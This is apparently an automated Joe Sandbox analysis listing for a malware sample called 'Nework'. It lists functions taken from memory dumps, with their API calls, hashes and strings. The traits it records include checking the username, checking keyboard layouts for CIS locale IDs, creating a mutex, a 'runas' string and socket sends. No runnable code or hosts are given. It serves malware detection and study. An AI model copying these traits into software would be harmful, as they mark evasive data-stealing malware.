Function 0019A879 Relevance: 47.0, APIs: 24, Strings: 2, Instructions: 1503
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryA.KERNEL32(00000000,53C1E996,00000000), ref: 0019A87C

Strings

VUUU, xrefs: 0019ADF2
@3P, xrefs: 0019B791

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: CurrentDirectory
String ID: @3P$VUUU
API String ID: 1611563598-3039269687
Opcode ID: 1afb52a1064a990ab1f42323adaaedcb1d1a3a8be748eee8349d05116d10c48d
Instruction ID: 43fdd973d912583b439b958ab0304c541f00cb20e487acb294ee505b60521c07
Opcode Fuzzy Hash: 1afb52a1064a990ab1f42323adaaedcb1d1a3a8be748eee8349d05116d10c48d
Instruction Fuzzy Hash: 35C20371A002089FDF18DF68DD89BEDB7B5EF49304F508198E40AA7291DB35AA84CF91

Function 00199760 Relevance: 24.7, APIs: 16, Instructions: 743
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a83a87ef6e8fe41b7e8bc9ae2edc74d7d5e6ff081fc80238adf07ab9be94ed8
Instruction ID: 469b6c43271cba13d5676e83df9b30d4a93a45de9c67fe412edef754f2fa764b
Opcode Fuzzy Hash: 7a83a87ef6e8fe41b7e8bc9ae2edc74d7d5e6ff081fc80238adf07ab9be94ed8
Instruction Fuzzy Hash: 5552D870D00248DBEF14EBB8C9997EDBBB2AF56314F644248E411673D2D7B54A88C7A2

Function 00197C40 Relevance: 7.9, APIs: 5, Instructions: 388
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(0000011C,53C1E996), ref: 00197CBA
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00197D1B
GetProcAddress.KERNEL32(00000000), ref: 00197D22
GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00197DE3
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00197DE7

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: InfoSystem$AddressHandleModuleNativeProcVersion
String ID:
API String ID: 374719553-0
Opcode ID: eab77ab1d6c5a32de38ffc8972990ab5d5e8dd3d0163508435e9d31e76f8bddb
Instruction ID: 66af9f741ad0d48e4a575eb1a6b42f0679d8e261edd2130da8a438222a45567b
Opcode Fuzzy Hash: eab77ab1d6c5a32de38ffc8972990ab5d5e8dd3d0163508435e9d31e76f8bddb
Instruction Fuzzy Hash: F3D10770E00218ABDF14BB68DC5B7AD7B72AB56310F54429CE4166B3C2DB758F818BD2

Function 001C638B Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,001C638A,?,?,?,?,?,001C73DE), ref: 001C63AD
TerminateProcess.KERNEL32(00000000,?,001C638A,?,?,?,?,?,001C73DE), ref: 001C63B4
ExitProcess.KERNEL32 ref: 001C63C6

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5c6ccab93913dbbcff0bb059ae38b071a3114deee37c1b2e300274dad011dac9
Instruction ID: 4e935bf429a9f138294692ea78267571be804fb0d849efc90baf909a095d6b0b
Opcode Fuzzy Hash: 5c6ccab93913dbbcff0bb059ae38b071a3114deee37c1b2e300274dad011dac9
Instruction Fuzzy Hash: CFE0B631000A88ABCB126F94DD49E5D3B6AFB68745B005418F90A8A931CB75DDD2CA81

Function 0019B010 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 0019B05D

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 89dc1abc21b90a498944085ff2969a46d840593ffa4f550590b7181a0b5e76e2
Instruction ID: 4c15b4196b310e0ea0290536448883eb0c344c9e7356bebb0cb9ea4034cd9ad9
Opcode Fuzzy Hash: 89dc1abc21b90a498944085ff2969a46d840593ffa4f550590b7181a0b5e76e2
Instruction Fuzzy Hash: 96212CB181015C9FDB2ADF14CD65BEAB7B8FB19704F0042D9E50663181D7745B88CFA0

Function 00195B20 Relevance: 23.2, APIs: 8, Strings: 5, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000419, xrefs: 00195FA8
Keyboard Layout\Preload, xrefs: 00195F64
0000043f, xrefs: 0019603B
00000422, xrefs: 00195FD9
00000423, xrefs: 0019600A

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 3fc0af1cacd2b27a7c3166bd15325b0ece19dcfda49a62e2de2df0d798aaa883
Instruction ID: 9b33bb457ed53adc9bf6def33ec7e7842f8871b881918267b0e5bbf5ed45139f
Opcode Fuzzy Hash: 3fc0af1cacd2b27a7c3166bd15325b0ece19dcfda49a62e2de2df0d798aaa883
Instruction Fuzzy Hash: 63F1BE7190024C9FEF24DF54CC84BEEBBBAEB55304F5041A9F519A72C1DB749A84CB90

Function 001D18AC Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001D1565: CreateFileW.KERNELBASE(00000000,00000000,?,001D1955,?,?,00000000,?,001D1955,00000000,0000000C), ref: 001D1582

GetLastError.KERNEL32 ref: 001D19C0
__dosmaperr.LIBCMT ref: 001D19C7
GetFileType.KERNELBASE(00000000), ref: 001D19D3
GetLastError.KERNEL32 ref: 001D19DD
__dosmaperr.LIBCMT ref: 001D19E6
CloseHandle.KERNEL32(00000000), ref: 001D1A06
CloseHandle.KERNEL32(001CAA82), ref: 001D1B53
GetLastError.KERNEL32 ref: 001D1B85
__dosmaperr.LIBCMT ref: 001D1B8C

Strings

H, xrefs: 001D1B11

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 15509a05220144466c45221481059c6ea24957b5b91ea26bc23b186e6d6ccc1a
Instruction ID: 321dd3f21c55defad44ab1a0ee903a0002b3459000f87e9729d644419ffa968d
Opcode Fuzzy Hash: 15509a05220144466c45221481059c6ea24957b5b91ea26bc23b186e6d6ccc1a
Instruction Fuzzy Hash: 89A13832A14184AFCF1DDF68DC92BAE3BB1AB16324F14014EF812AF391DB758952DB51

Function 0019D5EC Relevance: 13.9, APIs: 9, Instructions: 446
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0019D763
CreateDirectoryA.KERNELBASE(00000000,00000000), ref: 0019D87F
send.WS2_32(?,?,00000004,00000000), ref: 0019DA7E
send.WS2_32(?,?,00000008,00000000), ref: 0019DABA

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: send$CreateDirectoryFileModuleName
String ID:
API String ID: 2319890793-0
Opcode ID: b69e40c1e573c79a4bb8b73a765656ef614175d1a19ef2fd58c058764f27cabb
Instruction ID: beeba3af8535f92c6a9933a6818c865e6bcb086c4f590e51ab055b619c352ee0
Opcode Fuzzy Hash: b69e40c1e573c79a4bb8b73a765656ef614175d1a19ef2fd58c058764f27cabb
Instruction Fuzzy Hash: EBF1F271E002189BDF24DB68DC49BEDB7B4AF56314F1042D8E819A72C2DB71AAC4CB91

Function 0019D91C Relevance: 6.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ac078f070d7351bfcca4983303b825287d3b2069f136816b038d0298c068987
Instruction ID: e472e8f2990d90be719a4a5061821ad92023306021df485f2bc7f751b25c1ab0
Opcode Fuzzy Hash: 0ac078f070d7351bfcca4983303b825287d3b2069f136816b038d0298c068987
Instruction Fuzzy Hash: 1E41F472E001145BDF28DB78DC857AEB7B4AF46324F104669E82AE73D1EB30A950CB84

Function 001976C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 468
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000003E8), ref: 00197989

Strings

runas, xrefs: 00197213

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: runas
API String ID: 3472027048-4000483414
Opcode ID: 9949a650bedc17665084ba42aa2db9ba5ce987c64b059e0652a4866430b73d47
Instruction ID: d7368548e52902f6897cb9921f5c2ab93192e868496cda504efc891509a8bdac
Opcode Fuzzy Hash: 9949a650bedc17665084ba42aa2db9ba5ce987c64b059e0652a4866430b73d47
Instruction Fuzzy Hash: FFE16871A14148ABDF08EB78CD4ABADBB72EF52714F10825CF415AB3C6DB359A408792

Function 0019C206 Relevance: 3.5, APIs: 2, Instructions: 532
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001A7860: __Cnd_destroy_in_situ.LIBCPMT ref: 001A7958
Part of subcall function 001A7860: __Mtx_destroy_in_situ.LIBCPMT ref: 001A7961

Sleep.KERNEL32(000003E8), ref: 0019C659

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situMtx_destroy_in_situSleep
String ID:
API String ID: 113500496-0
Opcode ID: 2946138b09b432e576e8ad3acedbe078521cce69ca4e6310ef6814e55b228b78
Instruction ID: 2f759ffaa5eb4de8d4272ddeb4994e9ad77689c3e2eb08153c47c779a390b93c
Opcode Fuzzy Hash: 2946138b09b432e576e8ad3acedbe078521cce69ca4e6310ef6814e55b228b78
Instruction Fuzzy Hash: 1F12CF71A001089BEF08DFA8CD95BEDBBB6EF59304F64411CE845A7282D735EA84CBD1

Function 001A6B90 Relevance: 3.0, APIs: 2, Instructions: 23
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00199760: Sleep.KERNELBASE(00000064), ref: 0019A7D3
Part of subcall function 00199760: CreateMutexA.KERNELBASE(00000000,00000000,001F3224), ref: 0019A7F1
Part of subcall function 00199760: GetLastError.KERNEL32 ref: 0019A7F9
Part of subcall function 00199760: GetLastError.KERNEL32 ref: 0019A80A

Part of subcall function 00195B20: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 0019608D

CreateThread.KERNEL32(00000000,00000000,001A6AD0,00000000,00000000,00000000), ref: 001A6B70
Sleep.KERNEL32(00007530), ref: 001A6B85

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: CreateErrorLastSleep$MutexOpenThread
String ID:
API String ID: 2377761554-0
Opcode ID: 60c0f07c781060a24c3b5291c9c97a96500633aece3228706416acb34269740e
Instruction ID: 1922a404b1fb97a6b4f7467a74b282f750a1ee2a7422a2c25824e00245f8ba00
Opcode Fuzzy Hash: 60c0f07c781060a24c3b5291c9c97a96500633aece3228706416acb34269740e
Instruction Fuzzy Hash: 81E08C39795304ABE62133E02C07F5D7A156F2ABA1F690100F3692E0D29BE4348092FB

Function 0019CFA9 Relevance: 1.9, APIs: 1, Instructions: 386
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0019CFB7

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 2d626be2b97f49bce6baf264bcf94e6946102532e9fac32816117d0d80f8965c
Instruction ID: 5d15661ad5962bf8dab00dfc25eedbeeff5b6f1dae86a82046c50235ddd9eaa2
Opcode Fuzzy Hash: 2d626be2b97f49bce6baf264bcf94e6946102532e9fac32816117d0d80f8965c
Instruction Fuzzy Hash: A0E13971A002489BEF19DB38DD597EDBB71AF56304F5082CCE4096B3C2DB759B848B92

Function 0019D520 Relevance: 1.7, APIs: 1, Instructions: 164
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2888b5988b0fdec639096e7fe3f9670ae0b0c988e70ba1b08d6c03a7a9a9ff71
Instruction ID: 2b2c191f3db10ffb2bcd3a049324ee004a42747f6dd34feb2403a9fd2cf98b1d
Opcode Fuzzy Hash: 2888b5988b0fdec639096e7fe3f9670ae0b0c988e70ba1b08d6c03a7a9a9ff71
Instruction Fuzzy Hash: 2851CC709042689FEF25DB24CC98BEEBBB1AB1A304F5041D8D44867282DB755FC8CF91

Function 0019C740 Relevance: 1.6, APIs: 1, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c55a35fd7e0ffc6b421807122269c63303d1ee165db0fd4d5337f2e393d5c555
Instruction ID: 7e2d1fe5c2aad10755f01e64e457d52c8a3e641ed9f9d1cb11a0d9ab6c8cc65a
Opcode Fuzzy Hash: c55a35fd7e0ffc6b421807122269c63303d1ee165db0fd4d5337f2e393d5c555
Instruction Fuzzy Hash: F0316D31A10248AFDF08DFA8C985BEEBBB6FF49704F504619F815A7281D775E980CB90

Function 001CAA43 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsopen_s.LIBCMT ref: 001CAA7D

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: e1ef82b6c23f32661d54ea82156f1c12a23fd3d0fd1a21b694a3f878eb653c6a
Instruction ID: 58760ee13a90b1ee5b873fcc06f9493fd5cf753f61dc00251a33964131a4edb7
Opcode Fuzzy Hash: e1ef82b6c23f32661d54ea82156f1c12a23fd3d0fd1a21b694a3f878eb653c6a
Instruction Fuzzy Hash: 11111875A0420AAFCB06DF58E941E9A7BF5EF48308F054059F809AB251D731ED15CB65

Function 001D181E Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 001D1881

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: ff89ec45d56ad598fc1cdac097a9ffa15eccbe9b6325dd4b30191e09ed1fe268
Instruction ID: 663b9669acba6b7f5cc25b882d1b15f660e771e6d67ccdb79215ed4c9a4dd3c7
Opcode Fuzzy Hash: ff89ec45d56ad598fc1cdac097a9ffa15eccbe9b6325dd4b30191e09ed1fe268
Instruction Fuzzy Hash: 43012C72C00159BFCF02EFA89D01AEEBFB5AF18310F14416AF914A2251E731CA20EB91

Function 001D1565 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,001D1955,?,?,00000000,?,001D1955,00000000,0000000C), ref: 001D1582

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
